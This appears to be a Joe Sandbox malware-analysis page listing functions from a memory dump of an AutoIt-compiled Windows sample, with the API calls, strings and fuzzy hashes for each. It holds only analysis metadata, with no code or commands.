Opcode Fuzzy Hash: 46ce93d97a6e5885a507bb33c91a9fa515ab00e9abfb11d95430c3d5214f8ad5
Instruction Fuzzy Hash: AC912874A00701AFDB54DF64C894B6ABBFABF49710F20856DF94ACB291DB71E841CB50

Function 0067DE7C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0064C6F4: _wcscpy.LIBCMT ref: 0064C717

Part of subcall function 0063936C: __swprintf.LIBCMT ref: 006393AB
Part of subcall function 0063936C: __itow.LIBCMT ref: 006393DF

__wcsnicmp.LIBCMT ref: 0067DEFD
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0067DFC6

Strings

LPT, xrefs: 0067DEF7

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: b06995b0314e0e7919d675dcca2c1acca45ba4eb46e8cf432fbf1e84af866d80
Instruction ID: bc3dd1e096fc681326698d24e65b1e28dfcd9f5d7c08f1e9254b9dd9466dd1ca
Opcode Fuzzy Hash: b06995b0314e0e7919d675dcca2c1acca45ba4eb46e8cf432fbf1e84af866d80
Instruction Fuzzy Hash: 1461A275A00215AFCB14DF98C881EEEB7B6EF08310F05809DF54AAB391D774AE45CB94

Function 0067290D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 00672A72

Strings

I/j, xrefs: 0067297F
I/j, xrefs: 006729FC, 00672A64, 00672A12

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: _wcscpy
String ID: I/j$I/j
API String ID: 3048848545-2263288278
Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
Instruction ID: e170aba3b9b52b1b7fc9de3e12ccfa22d4de3879f319e75599a44467f81e23e3
Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
Instruction Fuzzy Hash: 61410831900217AACF25DF99C4619FDB7B2EF08310F54D04AF989A7395EB305E82C7A4

Function 0064BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0064BCDA
GlobalMemoryStatusEx.KERNEL32 ref: 0064BCF3

Strings

@, xrefs: 0064BCE8

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: c9a3daed1da133030ead2e49ae195462d8dc5fb776107b7a1189591d7ba01a8a
Instruction ID: 43701c5f96b202c7bc0102386deb349e0d33ab578495875a6f4d7c1fc36d8b62
Opcode Fuzzy Hash: c9a3daed1da133030ead2e49ae195462d8dc5fb776107b7a1189591d7ba01a8a
Instruction Fuzzy Hash: 44516871408749ABE360AF14DC96BAFBBEDFF94354F90484DF1C8410A2DF7085A88766

Function 0067C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 006344ED: __fread_nolock.LIBCMT ref: 0063450B

_wcscmp.LIBCMT ref: 0067C65D
_wcscmp.LIBCMT ref: 0067C670

Strings

FILE, xrefs: 0067C5A5

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 53ec9826c422fd98d3cf85f04cd01d04b566c45266a502f3a0a5f44dde659b1a
Instruction ID: 51479f40d7a57fa34facb7581fe997078349a0aafff6f1cc844f9834818ec448
Opcode Fuzzy Hash: 53ec9826c422fd98d3cf85f04cd01d04b566c45266a502f3a0a5f44dde659b1a
Instruction Fuzzy Hash: 8E41E872A0021ABADF609AA49C81FEF77BADF49710F00407DF605EB181DA70AA448794

Function 0069A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0069A85A
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0069A86F

Strings

', xrefs: 0069A7C3

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 0d635d71beb930dc0940968736db393476ae2880c705a8f6727a7956b40507bd
Instruction ID: 6e0e429caf2943bfb7dfc9fc2689d424a7bad42e22e2b2959005cef69179c507
Opcode Fuzzy Hash: 0d635d71beb930dc0940968736db393476ae2880c705a8f6727a7956b40507bd
Instruction Fuzzy Hash: D841EA74A012099FDF54CFA8D981BEA7BFAFB09340F14016AE905EB741D770A942CF91

Function 0069975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 0069980E
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0069984A

Strings

static, xrefs: 006997AA

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 3e82115d6b61ccb2eb033ad903c6f51e3a2dfd376f94ac41b1357812ddb543f1
Instruction ID: 1de0736d3602ef2d47cbafa3a20a2e60983fcc72ea5f661faf43b8469a049c35
Opcode Fuzzy Hash: 3e82115d6b61ccb2eb033ad903c6f51e3a2dfd376f94ac41b1357812ddb543f1
Instruction Fuzzy Hash: 6E316C71110604AAEB109F68CC81AFB73AEFF59764F10961DF8A9CB290DA31AC81D764

Function 00675157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006751C6
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00675201

Strings

0, xrefs: 006751BF

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 675770f276dc71c921963d41c22da64ad07a63874351b720e5dbd44d0905724a
Instruction ID: b9b36da441fdce642ef39b6216057af9dee2443e8e57e59e7dea59a68834a4e3
Opcode Fuzzy Hash: 675770f276dc71c921963d41c22da64ad07a63874351b720e5dbd44d0905724a
Instruction Fuzzy Hash: 9131A7316007049BEB24CF99D8457EDBBF6EF45350F14809DE9AAA62A1D7F09B84CB50

Function 0068658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00686608

Strings

AUTOITCALLVARIABLE%d, xrefs: 006865FA
, $, xrefs: 00686648

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: __snwprintf
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 2391506597-2584243854
Opcode ID: af53dbb98844c37d1697f03cc434bf239e53ffd92f334544bc76086497b9f763
Instruction ID: 55aa784b9fcf57b867b10daf5091b867416da87f25df3753a575e1f6d867c169
Opcode Fuzzy Hash: af53dbb98844c37d1697f03cc434bf239e53ffd92f334544bc76086497b9f763
Instruction Fuzzy Hash: D3218271600258AFCF50EFA4DC82EED77B6AF45700F00459DF506AB291DB70EA45CBAA

Function 006993CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0069945C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00699467

Strings

Combobox, xrefs: 00699429

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 2259cd17480b498c5f648413cd60f5f9e101a351818f99618499ef0da0b416f3
Instruction ID: c971d22aa8fb2a092999f820555d753ff325b85eb34da98fcf1f3ee46dc5ad3e
Opcode Fuzzy Hash: 2259cd17480b498c5f648413cd60f5f9e101a351818f99618499ef0da0b416f3
Instruction Fuzzy Hash: 811193712002086FEF129E58DC80EFB37AFEB587A4F100129F9189B690D6319C528770

Function 0069DA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 0064B34E: GetWindowLongW.USER32(?,000000EB), ref: 0064B35F

GetActiveWindow.USER32 ref: 0069DA7B
EnumChildWindows.USER32(?,0069D75F,00000000), ref: 0069DAF5

Strings

T1h, xrefs: 0069DAFB

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Window$ActiveChildEnumLongWindows
String ID: T1h
API String ID: 3814560230-297841062
Opcode ID: c03655bb3d7df2f582c1206ea4c18842077aafb34964b59008ccc27015f53ee7
Instruction ID: 910d2b0d6af38f6cf63effd4e608fd4c73230a21516ea737c96b2af837589e0d
Opcode Fuzzy Hash: c03655bb3d7df2f582c1206ea4c18842077aafb34964b59008ccc27015f53ee7
Instruction Fuzzy Hash: B8211B75204205DFCB14DF28D850AA677EBEF5A360F25162DE966CB3E0D730A851CF64

Function 006998FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0064D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0064D1BA
Part of subcall function 0064D17C: GetStockObject.GDI32(00000011), ref: 0064D1CE
Part of subcall function 0064D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0064D1D8

GetWindowRect.USER32(00000000,?), ref: 00699968
GetSysColor.USER32(00000012), ref: 00699982

Strings

static, xrefs: 00699945

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 49e3ead3add9175354b02a9ee47ae37936ba94a38d6cd154749e79b6243f85ef
Instruction ID: 630d45ea15849ad9d7f17677975bc10bef2776b04c6f4e03215a5151cc381aba
Opcode Fuzzy Hash: 49e3ead3add9175354b02a9ee47ae37936ba94a38d6cd154749e79b6243f85ef
Instruction Fuzzy Hash: B7114472620209AFDF04DFB8C845AEA7BAAEB08344F05162CF955E2250E635E851DB60

Function 00699617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00699699
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 006996A8

Strings

edit, xrefs: 0069967D

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 60d62253add5741e10e6b07919b975df6860660cdd35408df8ecfa61bde0ce69
Instruction ID: d0063f8ee94a8e0fd2a3fe9b3069e873c121125ae9f8fcd393a5d2cd0843ac70
Opcode Fuzzy Hash: 60d62253add5741e10e6b07919b975df6860660cdd35408df8ecfa61bde0ce69
Instruction Fuzzy Hash: 1F116A71500108AAFF109FA8DC41EFB3B6FEB053A8F104328F965976E0D7329C519B60

Function 00675262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006752D5
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 006752F4

Strings

0, xrefs: 006752CE

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 58b25a6c6c08cfd67d3673f76caeaf9dde3b1b5cb5322645f354bcf939753815
Instruction ID: a63add58d5e79d73a8ffdbcf55330ccb9b9441093ea8c00f879ef94a96c6022a
Opcode Fuzzy Hash: 58b25a6c6c08cfd67d3673f76caeaf9dde3b1b5cb5322645f354bcf939753815
Instruction Fuzzy Hash: 5911D675A11614EBDB10EE98D904BE977BB9B057A0F048196E91FA72A0E3F0EE04C791

Function 00684D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00684DF5
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00684E1E

Strings

<local>, xrefs: 00684DE6

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: b5e572c4d68603702d3aa99b51cc93e56a60580ef156c39eaab93387dbe902c0
Instruction ID: 218d2bd1bf5dac6a537b83d62a128f8ddaba1cd6555157ea7b78ae477388b15d
Opcode Fuzzy Hash: b5e572c4d68603702d3aa99b51cc93e56a60580ef156c39eaab93387dbe902c0
Instruction Fuzzy Hash: 571170B0501222FBDB259F51CC89EFBFAAAFF16755F10832AF51556240EBB05981C7E0

Function 0065A70C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006637A7
___raise_securityfailure.LIBCMT ref: 0066388E

Strings

(o, xrefs: 00663889

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: (o
API String ID: 3761405300-2713504974
Opcode ID: bf38144b44f1135c7acc3b88ffea07df978cd282830760c9c49fda3189fb6e85
Instruction ID: 4659d52e11bbe4936f2de30538c9418444532b4266874f413c94d7a72d8bbc70
Opcode Fuzzy Hash: bf38144b44f1135c7acc3b88ffea07df978cd282830760c9c49fda3189fb6e85
Instruction Fuzzy Hash: 6621EFB5540304DAE740DF55ED966603BB7BB4C310F50B82AE9088B3B2E3B1A984CB49

Function 0068A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0068A84E
htons.WSOCK32(00000000,?,00000000), ref: 0068A88B

Strings

255.255.255.255, xrefs: 0068A866

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: 0eeb9c47cc7dc1f7aefefe10e2453716e128116a75b2837935020eb35488d77f
Instruction ID: 2511da84bdbaac4e679447d5f7029710e1b437f6b557064ee734094b2c7becd6
Opcode Fuzzy Hash: 0eeb9c47cc7dc1f7aefefe10e2453716e128116a75b2837935020eb35488d77f
Instruction Fuzzy Hash: 6C01FEB5200305ABDB10AFA4C845FEDB766EF44320F10862BF9159B3D1D771E801C756

Function 0066B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0066B7EF

Strings

ComboBox, xrefs: 0066B78B
ListBox, xrefs: 0066B7B9

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: c05a845567b41a726cd89a629787a1e93e3903d562d9bc1cdc6efffd5ea23a0a
Instruction ID: d5413552e9e01a957dd4abb9772488a98fc980d673f5e016902b9650075868c5
Opcode Fuzzy Hash: c05a845567b41a726cd89a629787a1e93e3903d562d9bc1cdc6efffd5ea23a0a
Instruction Fuzzy Hash: FE01D471A41118EBCB44EBA8CC529FE736FBF55360B04061DF462A72D2EB7059088B94

Function 0066B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000180,00000000,?), ref: 0066B6EB

Strings

ComboBox, xrefs: 0066B687
ListBox, xrefs: 0066B6B5

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 9ce165de483c38c8628e506b18e2ea0ca023750fe6790b98a7bcdddb60d308dc
Instruction ID: a1ac19834d78c6b582ebe94163b262c66e4a6f9d3fed603248df059c4008b2e4
Opcode Fuzzy Hash: 9ce165de483c38c8628e506b18e2ea0ca023750fe6790b98a7bcdddb60d308dc
Instruction Fuzzy Hash: FF014F71A41109ABCB44EBA8C962AFE73AF9B05344F10002DB503F72D1EB545E199BE9

Function 0066B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000182,?,00000000), ref: 0066B76C

Strings

ComboBox, xrefs: 0066B70A
ListBox, xrefs: 0066B738

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

